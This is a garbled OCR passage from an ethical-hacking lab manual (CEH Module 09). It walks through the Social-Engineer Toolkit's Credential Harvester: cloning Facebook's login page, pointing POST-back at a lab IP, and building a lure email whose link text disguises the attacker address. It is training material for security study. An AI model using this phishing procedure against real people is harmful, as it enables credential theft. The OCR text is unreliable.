3 ‫ י‬T h i r d p.nrty Modules
4) Update the M e ta s p lo it Sranei/ork
5 ) Update th e S o c ia l-E n g in e e r T o o lk it
6 ) Update SET c o n fig u r a tio n
7) H e lp , C r e d it s , and About
99) E x it th e S o c ia l-E n g in e e r T o o lk it

FIGU RE 3.3: SET Main menu

5.

C E H L ab M anual Page 692

A list o f m e n u s 111 S o cia l-E n g in ee rin g A tta ck s w ill ap p ear; ty p e 2 an d
p ress Enter to select W ebsite A ttack V ectors.

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

« T e rm in a l
File Edit View Terminal Help

1

J o in us on i r c .f r e e n o d e .n e t in channel # s e to o lk t
The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec.
V is it:

C Q t i ! e Social-Engineer
Toolkit "Web Attack"
vector is a unique way of
utilizing multiple webbased attacks in order to
compromise the intended
victim.

h ttp s ://w w w .tru s te d s e c .c o m

S e le c t from th e menu:
1) S p e a r-P h is h in q A tta c k Vec to r s

| 2) W ebsite A tta c k V e c to rs |
3) I n fe c tio u s Media G en erato r
4 ) C re a te a Payload and L is te n e r
_ 5) Hass M a ile r A tta c k
‫ן‬
I 6 ) A rduino-B ased A tta c k v e c to r g
|^ % S M S S p oofing A tta c k V e c t o r ♦
8) W ir e le s s Access P o in t A tta c k V e c to r
9 ) QRCode G en erato r A t t a c | V e c to r
10) P o w ersh e ll A tta c k V e c tlr s
11) T h ir d P a rty Modules

_

^

I A

99) R eturn back to th e main menu.

>r5s _______________________________
FIGURE 3.4: Social Engineering Attacks menu

6.

111 th e n e x t set o f m e n u s th a t ap p ears, type 3 a n d p ress Enter to select
th e Credential Harvester Attack Method
File Edit View Terminal Help
and th e B a ck|T rack team . T h is method u t i l i z e s !fra m e replacem ents to
make th e h ig h lig h te d URL l i n k to appear l e g it i m a te however *tf en c lic k e d

a window pops up then i s re p la c e d w ith th e m a lic io u s l i n k . You can e d i t
th e l i n k replacem ent s e ttin g s in th e set^ c o n F ig i f i t s to n fc *k o « /fa s t.

1

0 3 T11e Credential
Harvester M ethod will
utilize web cloning o f a
website that has a username
and password field and
harvest all die information
posted to die website.

The M u lt i-A t t a c k method w i l l add a co m binatio n o f a tta c k s through th e web a tta c
k
Jr
menu. For example you can u t i l i z e th e Java A p p le t, M e ta s p lo it Browser,
C r e d e n t ia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t in th e M id d le a tta c k
a l l a t once to see which i s s u c c e s s fu l.
m.
1) Java A p p le t A tta c k Method
2) M e ta s p lo it Browser E x p lo it Method

I3) Credential Harvester Attack Method |
4) Tabnabbing Attack Method

ack

5 ) Man l e f t i n th e M id d le A tta c k Method
6) Web Jacking A tta c k Method

7 ) M u l t i - A t tack Web HethoJ
8) V ic tim Web P r o f i l e r
9 ) C re a te o r im p o rt a CodeSigning C e r t i f i c a t e
99)

Return to Main Menu

s e t :w eb attackj3B 1

FIGURE 3.5: website Attack Vectors menu

7.

C E H L ab M anual Page 693

U

N o w , type 2 an d p ress Enter to select th e S ite Cloner o p tio n fro m th e
m enu.

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

« T e rm in a l
File Edit View Terminal Help
9 ) C re a te o r im p o rt a CodeSigning

M

99) R eturn to Main Menu

C Q t 11e Site Cloner is used
to d o n e a website o f your
choice.

s e t : w e b a tta c k >3
The f i r s t method w i l l a llo w SET to im p o rt‫ *!' ׳‬l i s t o f p r e -d e fin e d web
a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t ta c k .
The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e c o m p le te ly
same web a p p lic a t io n you were a tte m p tin g to c lo n e .
I h e t h i r d method aU ow s y o u jto im p o rt your own w e b s ip ;, n ote t ^ a t you
Should o n ly have alt' in d e x .h tm l when using th e im p o rt W ebsite

Y jF

f u n c t io n a lit y ^ ^ *

1) Web T em plates
12) S i t e C lo n e r !
3) Custom Im p o rt

♦
v

I
I

^

I V

•)

/

‫׳‬

‫י‬

^ 3 4
\
- ■«‫״‬

99) R eturn to W ebattack Menu
;e t:w e b a tta c k a E f|_______________

FIGU RE 3.6: Credential Harvester Attack menu

T y p e th e IP ad d ress o f y o u r B a ck T rac k v iru ia l P C 111 th e p r o m p t to r IP
add ress for th e POST back in Harvester/Tabnabbing a n d p ress Enter.
111 tins exam ple, th e IP is 10.0.0.15
*

T e rm in a l

File Edit View Terminal Help

COS t 11e tabnabbing attack
method is used when a
victim has multiple tabs
open, when the user clicks
die link, die victim will be
presented with a “Please
wait while the page loads”.
W hen the victim switches
tabs because h e/she is
multi-tasking, the website
detects that a different tab
is present and rewrites die
webpage to a website you
specify. The victim clicks
back on the tab after a
period o f time and diinks
diey were signed out o f
their email program or their
business application and
types the credentials in.
W hen the credentials are
inserts, diey are harvested
and the user is redirected
back to the original
website.

C E H L ab M anual Page

694

a p p lic a t io n s t h a t i t

can u t i l i z e w it h in th e a t t a c k .

The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e co m p le te ly
same web a p p lic a t io n you were a tte m p tin g to c lo n e .
The t h i r d method a llo w s you to im p o rt you r own w e b s ite , n ote t h a t you
should o n ly have an in d e x .h tm l when using th e im p o rt w e b s ite
f u n c t io n a l it y .
1) Web Tem plates
2 ) S i t e C lo n e r
3) Custom Im p o rt

_

1 9 9 ) R eturn to W eb A ta c k Menu

J[jLS‫־‬ir br

I

/

.

* |

'

^

r3

t -1 C r e d e n tia l h a r v e s te r w i l t a llo w you to u t i l i z e th e clone c a p a b i l i t i e s w it h in

set

J

‫ן‬

[-1 t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p ie c e them in
*
to a re p o rt
[-1 T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o .
[ -J I f y o u 'r e using an e x t e r n a l I P , use your e x t e r n a l IP f o r t h is

:

> IP address for the POST back in Harvester/Tabnabbina:110.0.0.15|
FIGU RE 3.7: Providing IP address in H arvester/Tabnabbing

N o w , y o u w ill be p ro m p te d fo r a U R L to b e clo n ed , type th e d esired
U R L fo r Enter th e url to clo n e a n d p ress Enter. 111 tin s ex am p le, w e
h av e u se d w w w .fa ceb o o k .co m . T in s w ill n n tia te th e clo n in g o f th e
sp ecified w eb site.

E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

*

T e rm in a l

File Edit View Terminal Help
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h i n th e c o m p le te ly
same web a p p lic a t io n you w ere a tte m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^

C Q t 11e web jacking attack
method will create a
website clone and present
the victim with a link
stating that the website has
moved. This is a new
feature to version 0.7.

The t h i r d method a llo w s you to im p o r t-y m jr own w e b s ite , n o te t h a t you
should o n ly have an in d e x .h tm l when usin g th e im p o rt w e b s ite
f u n c t io n a l it y .
1) Web Tem plates

2) S i t e C lo n e r
3) Custom Im p o rt
99) R eturn to W ebattack Menu

[•]

:w eb a tta c k >2
—
C r e d e n tia l h a r v e s te r w i l l a llo w you to u t i l i z e

J[ ‫] ־‬r to> h a rv e s t

t h e c lo n e c a p a b il i t i e s w it h i r

1 TJ T
o r param eters f rom a w e b s ite

as w e ll as p la c e them ir
c r e d e n tia ls
to a r e p o r t I ^
■ %
I
%
■
I V
J
1
[-] T h is o p tio n i s used f o3r
r A
| hhaa t IP th e s e rv e r w i l l POST t o . V
^
[■ ] I f y o u 'r e using an e x t e r n a l IP , use your e x t e r n a l IP f o r t h i s
s e t :w eb a tta c k > IP address f o r th e POST back in H a rv e s te r/T a b n a b b in g : 1 0 . 0 . 0 . 1 5
[ • ] SET sup ports both HTTP and HTTPS

[ - ] Example: h t t p : //w w w . t h is is a f a k e s i t e . com____________
; e t :w eb atta ck> E n te r th e u r l to c lo n e :Rvww. fa c e b o o k . com!

M

FIGU RE 3.8: Providing URL to be cloned

10. A fte r clo n in g is c o m p le te d , th e h ig h lig h ted m essage, as sh o w n 111 th e
follow ing sc re e n sh o t, w ill a p p e a r o n th e Terminal screen o t SET. P ress
Enter to co ntinue.
11. I t w ill sta rt C red e n tia l H arv ester.
1333If you ’re doing a
penetration test, register a
name that’s similar to the
victim, for Gmail you could
do gmail.com (notice the
1), something similar diat
can mistake the user into
thinking it’s die legitimate

File Edit View Terminal Help
99) R eturn to W ebattack Menu
s e t :w e b a tta c k >2
[-1 C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e

51
th e c lo n e c a p a b il i t i e s w it h in

SET
[ - ] to h a rv e s t c r e d e n tia ls o r param eters from a w e b s ite as w e ll as p la c e them in

to a r e p o rt
[ - ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o .
t -J I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is
s e t :w e b a tta c k > IP address f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5
{ - ] SET sup ports both HTTP and HTTPS
I - ] Example: h t tp ://w w w .th is is a f a k e s it e .c o m
I
s e t : w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com

b
[*]
[*j

■

‫—ך‬

.

C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
T h is cou ld ta k e a l i t t l e b i t . . .
1
I J

Trie b e » « v Ttoaie fteu ■tfm .k i J 11
f i e l d s a re a v a il a b l e . R e g a rd le s s , K h i
[ ! ] I have read th e above message.
Press < r e tu r i

fo k c

-‫י‬

,

POSTs on a w e b s ite .

to c o n tin u e

FIGU RE 3.9: SET Website Cloning

12. L eave th e C red e n tia l H a rv e ste r A tta c k to fetc h in fo rm a tio n fro m th e
v ic tim ’s m achine.

C E H L ab M anual Page 695

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

*

T e rm in a l

File Edit View Terminal Help

m W hen you hover over
the link, die URL will be

presented with the real
URL, not the attacker’s
machine. So for example if
you’re cloning gmail.com,
the URL w hen hovered
over it would be gmail.com.
W hen die user clicks the
moved link, Gmail opens
and then is quickly replaced
with your malicious
Webserver. Remember you
can change the timing of
the webjacking attack in die
config/set_config flags.

[ - ] C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e th e c lo n e c a p a b i l i t i e s w it h in
SET
[ - ] t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p la c e them in
to a r e p o rt
——
[■ ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o . _ * a * * '
[ - ] I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is
s e t :w e b a tta c k > IP address f o r th e POST back i n H a r v e s t e r / T a b n a b b i n g : l # ^ ^ ^ ^ ^
[ - ] SET sup ports both HTTP and HTTPS
[-1 Example: h t t p : //w w w .th is is a f a k e s it e .c o m
s e t :w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com
[*]

C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
could ta k e a l i t t l e b i t . . .

[*j T h is

The bea t way to use t h i s a t t a c k i » i f
f i e l d s f t r g ava i l a b l e . R e j r d l e s s . ■ h i
I ' l l have read th e above message.
Press

sername and pas sw o rd torm
f tp t u r e s a l
POSTs A a webs

to co n tin u e

‫ ] ׳‬S o c ia l-E n g in e e r T o o lk i t C r e d e n t ia l H a rv e s te r A tta c k
, j C r e d e n t ia l H a rv e s te r i s running on p o r t 80
■] In fo rm a tio n w i l l be d is p la y e d to you as i t a r r iv e s below:

FIGU R E 3.10: SET Credential Harvester Attack

13. N o w , y o u h a v e to se n d th e IP address o f y o u r B a ck T rack m a ch in e to a
victim an d trick h im o r h e r to click to brow se th e IP ad d ress.
14. F o r tins d em o , la u n c h y o u r w e b b ro w se r 111 th e B a ck T rack m a ch in e ;
la u n c h y o u r fav o rite em ail service. 111 th is ex am p le w e h av e u se d
w w w .gm ail.com . L o g in to y o u r gm ail a c c o u n t a n d c o m p o se an email.

0 =5!Most o f die time they
w on’t even notice the IP
but it’s just another way to
ensure it goes on w ithout a

hitch. N ow that the victim
enters the username and
password in die fields, you
will notice that we can
intercept the credentials
now.

FIGURE 3.11: Composing email in Gmail

15. Place th e c u rso r 111 th e b o d y o f t 1e em ail w h e re y o u w ish to p lace th e
lake U R L . T h e n , click th e Link

C E H L ab M anual Page 696

CO

icon.

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


Module 09 - Social Engineering

‫ א‬C o m p o s e M ail —« ‫־‬
9) • >flma 1l.c o m * C m a il • M o z illa F ire to x
Ejle Edit yiew History flook marks Ipols Help

S' ‫ן‬

^

f i http‫״‬

|Ba:kTrack Lnux l i *

google.com/n^il,

T C | 121▼ Google

Gmail

Documents

Calendar

More •
0

G 0 v ‫׳‬g l e
Discard

°
Inbox
SUrrwJ
Important
Sert Mail
Drafts (2)

Q,

nsiwe Security |lE x p lo it‫־‬DB ^A ircrack-n g J^SomaFM

-

Lab«h‫»־‬

+ Share

o

Draft autosaveti at 10:4a AM (0 minutes ago)

,

I

Add Cc Add Bcc
Su bject

@TOI F - Party Pictures
Attach a no

I

‫ ־‬b

►Circles

y

T ‫ ־‬rT * A ‫| © • ־ד ־‬o o |i= }= •5

is ‫י י‬

*

*

^

I* « Plain Toxt

chock spoiling■‫״‬

Hoilo Sam.
PI»4m» click this link lo view tt>*♦ w»#»kt»11d (vtrty pictures at TGIF wflh thw cmMxMim*

Regards.

m.
Search chat or SU'
9‫«י‬

FIGURE 3.12: Linking Fake URL to Actual URL

16. 111 th e Edit Link w in d o w , first type th e actu al ad d ress in th e Web
add ress field u n d e r th e Link to o p tio n a n d th e n type th e fake U R L 111
th e T ext to display held. 111 tins ex am p le, th e w eb ad d re ss w e h av e
u se d is http://10 .0.0.15 a n d tex t to d isplay is

w w w .facebook.com /R ini TGIF. C lick OK
‫׳־י‬

tile

‫ א‬C o m p o s e M ail ‫ •■■■ ■■«<■» ־‬. ‫) ן‬g )g m ail.co m - C m a il • M o z illa F ire to x

yiew History flookmarks !pols Help

Edit

IM CCompose Mail *

3 !5 ‫■ ״‬

ra p ‫• ־‬

googie.com

▼©

I f l r Google

Q.

(BackTrack Lnux ensi we Security ||F x p lo it‫־‬DB ^A ircrack-n g j ^ r>omaFM
»Rlni

Search

Images

Maps

Play

YouTube

G o .)g Ie
Draft eutosaved at 10:45 AM (0 minutes ago)

Inbox
Starred
Important
Sent Ma!
Drafts (2)

E d it Link

Circles

U r* to.

X

Toxt to aiepiay: L w (vfacehook coaVRinl TGIf J Q

JunkE-mal

To what URL should this link go?

0 Web address

|wtp0.0.15 10‫־‬/‫ | ׳‬Q

C Email * * ♦‫י י•־‬

T*‫>״‬l this in*
Not sure wrhat lo pul In the boxT r m fhd t**■imgean the t*ob far you wanr lo Ink to (A
acarcAcnainc nvotit be useful.) Then coo rtc acb addNsa from me box h your browser's
acMroso Qor and potto it 140 tno box aoov•

|

OK

|

Cared

FIGU RE 3.13: Edit Link window

17. T h e fake U R L sh o u ld a p p e a r 111 th e em ail b o d y , as sh o w n 111 th e
follow ing screen sh o t.

C E H L ab M anual Page 697

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

Module 09 - Social Engineering

Ejle Edit

‫ א‬Com pose Mail ‫—» ־‬............. • (g>gma1l.com * Cmail • Mozilla Firefox
History flook marks Ipols Help

|Ba:kTrack Linux |*|Offensive Security |[JjExploit-DB ^A ircrack-n g jgjjSomaFM

G 0 v ‫׳‬g l e
Saved

c a The Credential
Harvester M ethod will
utilize web cloning o f a
website that has a username
and password field and
harvest all die information
posted to the website.

Discard

To

Labels •»‫־‬

Draft autnsaved at 11:01 AM (0 minutes ago)

0 ‫־‬

B

@yahoo com,

Inbox

Add Cc Add Bcc

SUrred
Important
Sert Mail
Drafts (2)

(QTGIF - Party Pictures

Subjed

Attach a 10‫ת‬

►Circles

I

Sf ‫ ־‬B

U

T - »T - A, • T - ©

oo | -

IE 3

is

H

«

=3 ^

, piain roxt

chock spoiling■'

hello Sam.
P1-*m» click this Ilfikj ivivw U:»|>r11* t:
<1 parly picturws at TGIF wilh lh» celatarttlM

Koqaroe.

Search 1
9*

FIGURE 3.14: Adding Fake URL in the email content

18. T o v erity th a t th e fake U R L is linked to th e actual U R L , click th e fake
U R L a n d it w ill display th e actual U R L as Go to link: w ith th e actual

U R L . S end th e em ail to th e in te n d e d user.
•‫־‬

x C om pose M a il -

• • -•

ipg m m l.co m - G m ail • M o z illa F ire fo x

File Edit yie* History gookmarks !0015 Help
M Compose Mail -

V

5r'

Q B d ikT ta ckU n u *

r g | |>|t r.ocinle Q, (g

oogle.com
OffensiveSecurity |lE xplo it-D B
ages

Maps

Play

KA ircrack-ng |£SomdFM

YouTube

G o u g le

+ Share
Discard

Labels »

Draft autosaved at 11:01 AM (0 minutes ago)

[ ‫]־‬

0•

@yahoo.c

m

In some cases when
you’re performing an
advanced social-engineer
attack you may want to
register a domain and buy
an SSL cert that makes die
attack more believable. You
can incorporate SSL based
attacks with SET. You will
need to turn the
WEBATTACK_SSL to

O N . If you want to use
self-signed certificates you
can as well however there
will be an “u n tru sted ”
warning when a victim goes
to your website

Inbox
Starred
Important
Sert Ms
Drafts (2)
Circles

Add Cc Add Bcc
Sucjecl

@TGI F - Party Pictures
Attach a no

‫מ‬

■ B

I

U

T • tT * A ‫ ־‬T • ©

M

jE IE •= 1 ‫ ׳‬M E

=

1

/ x « Plain Text

Check Spelling-

JunkE-mal
Please click this link ww\v.facebQ0k.CQmrcpgjrcfc

| Go to link. Mlp:f/10.0.0. 1y - Chanoe Remove y |

FIGURE 3.15: Actual URL linked to Fake URL

19. W h e n th e v ic tim clicks th e U R L , h e o r she will be p re se n te d w ith a
replica o f Facebook.com
20. T h e v ictim w ill b e en ticed to en te r 111s o r h e r u ser n a m e an d p assw o rd
in to th e fo rm fields as it ap p ears to be a g en u in e w ebsite. W h e n th e
v ic tim en ters the U sernam e an d Passw ord an d clicks Log In, it do es
n o t allow logging in; in stead , it red irects to th e legitim ate F a c e b o o k
login page. O b serv e th e U R L in th e brow ser.

C E H L ab M anual P ag e 698

E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]